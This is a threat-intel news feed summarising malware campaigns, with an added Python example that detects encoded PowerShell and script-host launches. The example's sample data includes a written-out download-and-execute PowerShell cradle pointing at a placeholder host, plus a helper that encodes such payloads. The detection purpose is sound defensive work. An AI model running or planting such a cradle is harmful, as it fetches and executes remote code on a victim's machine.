News
Payload Ransomware Uses ChaCha20 and Aggressive Anti-Forensics
4 hours, 11 min ago (106 words) SOC Prime Bias: High
Shai-Hulud Worm Hits NPM and PyPI Supply Chains
1 week, 5 days ago (132 words) SOC Prime Bias: Critical
APT37 Uses LNK Phishing to Deliver Python Backdoor
1 week, 5 days ago (281 words) SOC Prime Bias: Critical The report outlines a multi-stage intrusion campaign linked to the North Korean APT37 group. Initial access begins with spear-phishing emails that carry ZIP archives containing malicious LNK shortcut files. When opened, the LNK launches an obfuscated batch…
Fake OpenClaw Installer Delivers Rust Infostealer
2 weeks, 1 day ago (90 words) SOC Prime Bias: Medium
Malicious OpenClaw Skill Delivers Remcos and Ghost Loader
2 weeks, 5 days ago (115 words) SOC Prime Bias: Critical
Kimsuky LNK Campaign Drops Python Backdoor via Dropbox C2
1 month, 2 weeks ago (120 words) SOC Prime Bias: Critical The Kimsuky threat actor drops two malicious files to the victim host: The attacker invokes these scripts directly using the native Windows script hosts to stay "living off the land": Both executions generate a Process Creation event with the…
5 Browser and AI Security Risks Keeping CxOs Awake
1 month, 2 weeks ago (220 words) SOC Prime Bias: High The report references behaviors such as chunked payload delivery that is reassembled in memory, credential-stealing extensions, AI-assisted spear-phishing, and prompt-injection attempts aimed at agentic browsing workflows. It also cites data points indicating a meaningful share of…
LiteLLM Supply Chain Attack: PyPI Versions 1.82.7 and 1.82.8
1 month, 2 weeks ago (106 words) SOC Prime Bias: Critical
XWorm Stealer via BAT Loader and Telegram Exfiltration
3 months, 2 weeks ago (80 words) SOC Prime Bias: Medium Encode the malicious payload (a simple downloader that runs the received script): Execute the encoded command: This single line generates the exact telemetry the Sigma rule expects: a PowerShell process, the -EncodedCommand flag, and…
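Two entries above describe the process-creation telemetry a detection should key on: scripts launched through the native Windows script hosts (the Kimsuky LNK campaign) and PowerShell started with the -EncodedCommand flag (the XWorm BAT loader). The Python below is an added example, not SOC Prime's code nor a Sigma rule from either report. It assumes Sysmon Event ID 1 style field names (Image, CommandLine, ParentImage); the sample events, the script-file extensions and the "user-writable" path list are constructed for the example and should be tuned to your environment.

```python
# Added example (not code from SOC Prime or the cited reports): detection
# logic for two process-creation patterns the feed entries describe. The
# sample events below are constructed for the example, not real telemetry.
import base64
import binascii
import ntpath
import re

# Every prefix powershell.exe accepts for -EncodedCommand (-e, -en, -enc,
# ... -EncodedCommand) plus the documented -ec alias; attackers use short ones.
_ENC_PREFIXES = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}

# Download-cradle markers to look for inside the decoded script.
CRADLE_RE = re.compile(
    r"(?i)\b(iex|invoke-expression|downloadstring|downloadfile|"
    r"net\.webclient|invoke-webrequest|iwr|frombase64string)\b")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = re.compile(r"(?i)\.(vbs|vbe|js|jse|wsf)\b")  # assumed extensions
# Assumed user-writable locations; tune to your environment.
USER_WRITABLE_RE = re.compile(r"(?i)\\(AppData|Temp|Downloads|Public|ProgramData)\\")


def encode_powershell_command(script: str) -> str:
    """Produce the Base64(UTF-16LE) blob -EncodedCommand expects (attacker side)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str):
    """Reverse the encoding. Return None when the blob is not valid
    Base64/UTF-16LE; a flag with an undecodable argument is itself suspicious."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:  # UTF-16 needs an even byte count
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def find_encoded_command(command_line: str):
    """Return the argument following any -EncodedCommand spelling, else None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/") and tok[1:].lower() in _ENC_PREFIXES:
            return tokens[i + 1]
    return None


def analyze(event: dict):
    """Apply both rules to one process-creation event; return a list of alerts."""
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"]
    alerts = []
    if image in ("powershell.exe", "pwsh.exe"):
        blob = find_encoded_command(cmd)
        if blob is not None:
            decoded = decode_powershell_command(blob)
            alerts.append({
                "rule": "powershell_encoded_command",
                "parent": ntpath.basename(event["ParentImage"]),
                "decoded": decoded,
                "download_cradle": bool(decoded and CRADLE_RE.search(decoded)),
            })
    elif image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
        alerts.append({
            "rule": "script_host_execution",
            "parent": ntpath.basename(event["ParentImage"]),
            "user_writable_path": bool(USER_WRITABLE_RE.search(cmd)),
        })
    return alerts


def detect(events):
    """Run analyze() over a batch of events and flatten the alerts."""
    return [a for e in events for a in analyze(e)]


# Constructed sample: a harmless one-liner standing in for the downloader.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                    + encode_powershell_command(SAMPLE_SCRIPT)},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe //B C:\Users\victim\AppData\Local\Temp\update.vbs"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},  # benign
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -ec YWJj"},  # flag present, blob not UTF-16
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},  # admin use
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two practical caveats: matching on the Image path misses a renamed powershell.exe, so production rules usually also check Sysmon's OriginalFileName; and the script-host rule fires on legitimate administration (the slmgr.vbs event above), so the user_writable_path and parent fields are there to drive triage rather than to suppress the alert outright.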
Voicemail Lure Drops Remotely RMM via BAT Script
3 months, 2 weeks ago (222 words) SOC Prime Bias: Medium Threat actors are hosting German-language "voicemail" landing pages that entice users to download a BAT file. The script plays a benign audio decoy while quietly installing the legitimate Remotely remote monitoring tool. Once deployed, the RMM…